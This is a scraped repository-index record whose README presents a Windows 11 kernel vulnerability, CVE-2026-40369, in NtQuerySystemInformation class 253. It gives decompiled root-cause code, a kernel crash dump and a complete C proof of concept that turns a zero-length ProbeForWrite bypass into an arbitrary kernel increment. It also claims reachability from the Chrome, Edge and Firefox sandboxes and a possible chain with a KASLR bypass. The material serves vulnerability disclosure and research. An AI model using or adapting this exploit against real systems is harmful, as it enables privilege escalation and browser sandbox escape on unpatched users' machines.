[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-77712":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":13,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":13,"compositeScore":16,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":17,"fork":17,"defaultBranch":18,"hasWiki":17,"hasPages":17,"topics":19,"createdAt":9,"pushedAt":9,"updatedAt":20,"readmeContent":21,"aiSummary":22,"trendingCount":14,"starSnapshotCount":14,"syncStatus":23,"lastSyncTime":24,"discoverSource":25},77712,"CVE-2026-40369-EXPLOIT","orinimron123\u002FCVE-2026-40369-EXPLOIT","orinimron123","Full exploit code for CVE-2026-40369 - A Windows kernel arbitrary write vulnerability that allows browser sandbox escape from all browsers render process sandbox",null,"C++",229,52,4,0,101,54.17,false,"main",[],"2026-06-12 04:01:22","## Full Blog - https:\u002F\u002Fpwn2nimron.com\u002Fblog\n\n# CVE-2026-40369: Arbitrary Kernel Address Increment via NtQuerySystemInformation (Class 253)\n\n## Summary\n- **Type:** Arbitrary kernel write (increment) — PRIVILEGE ESCALATION PRIMITIVE\n- **Component:** ntoskrnl.exe — `ExpGetProcessInformation`\n- **Trigger:** `NtQuerySystemInformation(SystemProcessInformationExtension, kernelAddr, 0, &needed)`\n- **Impact:** Arbitrary kernel address increment (write primitive) from any unprivileged process\n- **Reachable from Chrome sandbox:** YES (NtQuerySystemInformation is not blocked)\n- **Windows versions:** Windows 11 24H2-25H2\n- **Exploit reliablity** 100% deterministic\n- **KASLR Bypass can be chained with prefetch tool** https:\u002F\u002Fgithub.com\u002Fexploits-forsale\u002Fprefetch-tool \n\n## Root Cause\n\n`ExpGetProcessInformation` is called by `ExpQuerySystemInformation` for info classes\n5 (SystemProcessInformation), 0x39, 0x94, 0xFC, and **0xFD (253 = SystemProcessInformationExtension)**.\n\nThe call site at `ExpQuerySystemInformation+0xD7A`:\n```c\n\u002F\u002F Cases 5, 0x39, 0x94, 0xFC, 0xFD all share this call:\nresult = ExpGetProcessInformation((unsigned int *)userBuffer, bufferLength, &returnSize, NULL, infoClass);\n```\n\nWhen userBuffer is also points to Kernel (e.g., probing for required buffer size), the function enters:\n\n```c\n\u002F\u002F ExpGetProcessInformation, simplified:\n__int64 ExpGetProcessInformation(unsigned int *buffer, unsigned int length, ..., int infoClass)\n{\n    v91 = buffer;  \u002F\u002F = NULL\n\n    if (infoClass == 252) {\n        v86 = v91;  \u002F\u002F class 252 uses v86\n        \u002F\u002F ...\n    } else {\n        v86 = NULL;\n        if (infoClass == 253) {\n            v95 = v91;  \u002F\u002F v95 = NULL (BUG: sanitization for kernel address check!)\n            goto LABEL_11;\n        }\n        \u002F\u002F class 5 path - uses v81, doesn't touch v95\n    }\n    v95 = NULL;  \u002F\u002F class 252 path falls through here\n\nLABEL_11:\n    \u002F\u002F ... process iteration loop ...\n    while (NextProcess) {\n        if (infoClass == 253) {\n            ++*v95;          \u002F\u002F CRASH: v95 is Arbitrary Kernel Address\n            v95[1] += ...;   \u002F\u002F Would also crash\n            v95[2] += ...;   \u002F\u002F Would also crash\n        }\n        \u002F\u002F class 5\u002F252 paths handle NULL buffer correctly\n    }\n}\n```\n\nFor class 253, `v95` is set to the buffer pointer (`v91 = buffer = NULL`) without any NULL check.\nThe process iteration loop then tries to increment a counter at `*v95`, causing a NULL pointer\ndereference in kernel mode → BSOD.\n\nClasses 5 and 252 handle NULL buffers correctly because they use different variables (`v81`\u002F`v86`)\nand have proper checks before dereferencing.\n\n## Crash Details\n\n```\nPAGE_FAULT_IN_NONPAGED_AREA (50)\nInvalid system memory was referenced.  This cannot be protected by try-except.\nTypically the address is just plain bad or it is pointing at freed memory.\nArguments:\nArg1: ffff800041424344, memory referenced.\nArg2: 0000000000000002, X64: bit 0 set if the fault was due to a not-present PTE.\n\tbit 1 is set if the fault was due to a write, clear if a read.\n\tbit 3 is set if the processor decided the fault was due to a corrupted PTE.\n\tbit 4 is set if the fault was due to attempted execute of a no-execute PTE.\n\t- ARM64: bit 1 is set if the fault was due to a write, clear if a read.\n\tbit 3 is set if the fault was due to attempted execute of a no-execute PTE.\nArg3: fffff803a06db22e, If non-zero, the instruction address which referenced the bad memory\n\taddress.\nArg4: 0000000000000002, (reserved)\n\nIP_IN_PAGED_CODE: \nnt!ExpGetProcessInformation+42e\nfffff803`a06db22e ff03            inc     dword ptr [rbx]\n\nSTACK_TEXT:  \n*** WARNING: Unable to verify checksum for poc.exe\nUnable to load image C:\\Users\\vm\\poc.exe, Win32 error 0n2\nffffd380`d4dc52f8 fffff803`a01b2d82     : ffffd380`d4dc5378 00000000`00000001 00000000`00000100 fffff803`a02c4801 : nt!DbgBreakPointWithStatus\nffffd380`d4dc5300 fffff803`a01b22ac     : 00000000`00000003 ffffd380`d4dc5460 fffff803`a02c4970 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12\nffffd380`d4dc5360 fffff803`a00fba97     : 00000000`00000000 fffff803`9fe46273 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0xb2c\nffffd380`d4dc5af0 fffff803`9fe29dc0     : 00000000`00000050 ffff8000`41424344 00000000`00000002 ffffd380`d4dc5d90 : nt!KeBugCheckEx+0x107\nffffd380`d4dc5b30 fffff803`9fe16d96     : fffff803`a0bd9680 ffff8000`00000000 ffff8000`41424344 0000007f`fffffff8 : nt!MiSystemFault+0x850\nffffd380`d4dc5c20 fffff803`a02b9ecb     : 00000000`00000000 00000000`0000000f 00000000`00000000 0000000c`00000000 : nt!MmAccessFault+0x646\nffffd380`d4dc5d90 fffff803`a06db22e     : 00000000`00000001 00000000`00000001 00000000`c0000004 00000000`000000fd : nt!KiPageFault+0x38b\nffffd380`d4dc5f20 fffff803`a06dcfbf     : 00000000`00000000 00000000`00000000 ffff8701`f54e4118 00000000`00000000 : nt!ExpGetProcessInformation+0x42e\nffffd380`d4dc6540 fffff803`a06e1061     : 00000000`00001000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ExpQuerySystemInformation+0xd7f\nffffd380`d4dc6aa0 fffff803`a02be355     : 00000285`00b20000 ffff8701`f54e4080 ffff8701`f54e4080 00000000`00000000 : nt!NtQuerySystemInformation+0x91\nffffd380`d4dc6ae0 00007ffd`5bc82154     : 00007ff6`f01c10ef 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 : nt!KiSystemServiceCopyEnd+0x25\n000000e8`7679faf8 00007ff6`f01c10ef     : 00007ff6`f01e20a0 00007ff6`f01e20a0 00007ffd`5bc82140 00000285`00da4eb5 : ntdll!NtQuerySystemInformation+0x14\n000000e8`7679fb00 00007ff6`f01c1374     : 00000000`00000000 00000285`00da3ab0 00000000`00000000 00000000`00000000 : poc+0x10ef\n000000e8`7679fb30 00007ffd`5a5ae8d7     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : poc+0x1374\n000000e8`7679fb70 00007ffd`5bbac48c     : 00000000`00000000 00000000`00000000 000004f0`fffffb30 000004d0`fffffb30 : KERNEL32!BaseThreadInitThunk+0x17\n000000e8`7679fba0 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2c\n```\n\n## Reproduction\n\nMinimal reproducer (unprivileged, no special tokens needed):\n```c\n\u002F**\n * poc.c — NtQuerySystemInformation class 253 arbitrary kernel increment PoC\n *\n * Demonstrates arbitrary kernel DWORD increment via ProbeForWrite bypass.\n * Passes a kernel address as the output buffer with Length=0, causing\n * ExpGetProcessInformation to increment DWORDs at the target address\n * without validation.\n *\n * Build: cl \u002FW4 \u002FO2 poc.c \u002FFe:poc.exe \u002Flink ntdll.lib\n *\u002F\n\n#include \u003Cwindows.h>\n#include \u003Cstdio.h>\n\n#pragma comment(lib, \"ntdll.lib\")\n\ntypedef long NTSTATUS;\n\n#define SystemProcessInformationExtension 253\n\ntypedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(\n    ULONG SystemInformationClass,\n    PVOID SystemInformation,\n    ULONG SystemInformationLength,\n    PULONG ReturnLength\n);\n\nint main(void)\n{\n    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)\n        GetProcAddress(GetModuleHandleW(L\"ntdll.dll\"), \"NtQuerySystemInformation\");\n\n    if (!pNtQSI) {\n        printf(\"[-] Failed to resolve NtQuerySystemInformation\\n\");\n        return 1;\n    }\n\n    PVOID target = (PVOID)0xffff800041424344ULL;\n\n    printf(\"[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC\\n\");\n    printf(\"[*] Target kernel address: %p\\n\", target);\n    printf(\"[*] Will write:\\n\");\n    printf(\"      [target+0] += num_processes  (DWORD increment)\\n\");\n    printf(\"      [target+4] += total_threads  (DWORD add)\\n\");\n    printf(\"      [target+8] += total_handles  (DWORD add)\\n\");\n    printf(\"\\n\");\n    printf(\"[!] This WILL bugcheck if the address is not mapped writable memory.\\n\");\n    printf(\"[*] Press Enter to trigger...\\n\");\n    getchar();\n\n    ULONG needed = 0;\n    NTSTATUS status = pNtQSI(\n        SystemProcessInformationExtension,\n        target,   \u002F* kernel address — ProbeForWrite skipped because Length=0 *\u002F\n        0,        \u002F* Length=0 bypasses ProbeForWrite entirely *\u002F\n        &needed\n    );\n\n    printf(\"[*] NtQuerySystemInformation returned: 0x%08lX\\n\", status);\n    printf(\"[*] Required length: %lu\\n\", needed);\n    printf(\"[+] Done. If you see this, the writes succeeded without bugcheck.\\n\");\n\n    return 0;\n}\n\n```\n\n## Exploitability Assessment — ARBITRARY KERNEL WRITE\n\n### The ProbeForWrite Bypass\n\n`ExpQuerySystemInformation` calls `ProbeForWrite(buffer, Length, alignment)` before dispatching.\n**ProbeForWrite with Length=0 is a complete NO-OP** — the entire function body is gated by `if (Length)`.\n\nSo: `NtQuerySystemInformation(253, arbitraryKernelAddr, 0, &needed)` passes an unvalidated\nkernel pointer through to `ExpGetProcessInformation`.\n\n### The Write Primitive\n\nFor each process on the system, the function executes:\n```c\nv95 = userBuffer;  \u002F\u002F attacker-controlled pointer, NOT validated for class 253 with Length=0\n\n\u002F\u002F For EACH process:\n++*v95;              \u002F\u002F *(uint32*)(addr+0) += 1\nv95[1] += threadCnt; \u002F\u002F *(uint32*)(addr+4) += process_active_thread_count\nv95[2] += handleCnt; \u002F\u002F *(uint32*)(addr+8) += process_handle_count\n```\n\nThis gives:\n- **addr+0:** Incremented by 1 per process → total = number of processes on the system\n- **addr+4:** Sum of all process thread counts\n- **addr+8:** Sum of all process handle counts\n\n### Why the writes happen despite LENGTH=0\n\n`ExpGetProcessInformation` checks `if (length \u003C 12)` and sets STATUS_INFO_LENGTH_MISMATCH,\nbut **does NOT return early**. It stores the error status and continues into the process\niteration loop, executing the writes to `v95` for every process before finally returning\nthe error status.\n\n\n### Works From Chrome Sandbox, Edge, Firefox\n\nFully reachable:\n- NtQuerySystemInformation is NOT blocked by win32k lockdown\n- The restricted token does NOT prevent this syscall\n- Untrusted integrity level does NOT prevent this syscall\n\n\n![alt text](image.png)\n\n\n## Credit\nFound and written by Ori Nimron (@orinimron123)\n","该项目提供了针对CVE-2026-40369漏洞的完整利用代码，该漏洞是一个Windows内核任意写入漏洞，允许从所有浏览器渲染进程沙箱中逃逸。核心功能在于通过调用`NtQuerySystemInformation`函数（类253）实现对任意内核地址的增量操作，从而绕过Chrome等浏览器的沙箱保护机制。技术特点包括100%确定性的利用可靠性以及可以与预取工具结合使用以绕过KASLR。适用于安全研究人员进行漏洞分析和测试，以及企业内部的安全团队评估系统安全性。",2,"2026-06-11 03:55:54","CREATED_QUERY"]